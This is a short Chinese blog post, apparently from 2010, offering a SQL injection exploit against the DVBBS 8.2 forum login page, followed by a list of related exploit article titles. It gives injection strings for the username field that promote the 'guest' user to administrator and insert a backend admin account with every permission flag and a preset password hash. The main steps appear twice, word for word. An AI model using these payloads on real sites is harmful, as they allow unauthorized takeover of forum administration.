DVBBS 8.2 漏洞利用
2010-04-19 14:52
218 查看
在用户名处写入“';update dv_user set usergroupid=1 where username='guest'--”密码我就用正确的来写然后写好后登陆看到反回的信息
我们可以看到登陆提示为“本论坛不存在该用户名”这个就说明我们所提升的帐户“guest”已经为管理员了。
现在我们已经是前台管理员了。
那么怎样才能让我们的帐户具有后台权限呢?我们继续来到login.asp这个登陆页面。在用户名处写入guest';insert into dv_admin (username,password,flag,adduser) values('guset','49ba59abbe56e057','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45','guest')--
49ba59abbe56e057为MD5加密后的密码
成功登陆的话 就说明提权成功
我们可以看到登陆提示为“本论坛不存在该用户名”这个就说明我们所提升的帐户“guest”已经为管理员了。
现在我们已经是前台管理员了。
那么怎样才能让我们的帐户具有后台权限呢?我们继续来到login.asp这个登陆页面。在用户名处写入guest';insert into dv_admin (username,password,flag,adduser) values('guset','49ba59abbe56e057','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45','guest')--
49ba59abbe56e057为MD5加密后的密码
成功登陆的话 就说明提权成功
相关文章推荐
- DVBBS 8.2 漏洞利用
- 对dvbbs7.1 sp1最新savepost.asp漏洞的研究和利用
- bind8.2-8.2.2漏洞利用HOWTO(端口53的利用)
- DVBBS7.0Sp2前台提权漏洞利用程序[Kendy版]源码
- Dvbbs 8.2 login_sql注入漏洞探析
- 动网论坛8.2经典注入漏洞利用
- dvbbs 8.2 SQL Injection注射漏洞分析
- dvbbs 8.2 SQL注射漏洞分析
- dvbbs7.1sp1最新漏洞的研究和利用
- dvbbs7.1sp1最新漏洞的研究和利用
- Dvbbs7.1 sp1 SQL版savepost.asp注入漏洞分析、利用及防范
- 360[警告]跨站脚本攻击漏洞/java web利用Filter防止XSS/Spring MVC防止XSS攻击
- 永恒之蓝(EternalBlue)漏洞利用实例
- 关于 WinXP SP2 下的 MIDI 漏洞利用
- 利用X-scan发现系统漏洞
- Linux 格式化字符串漏洞利用
- 利用CVE-2017-11882漏洞利用的恶意样本分析
- PHPWIND & DISCUZ! CSRF漏洞利用测试分析
- 爬取joomla漏洞库中存在利用代码的链接
- 网络攻防实战:老Y文章管理系统V2.2注入漏洞分析与利用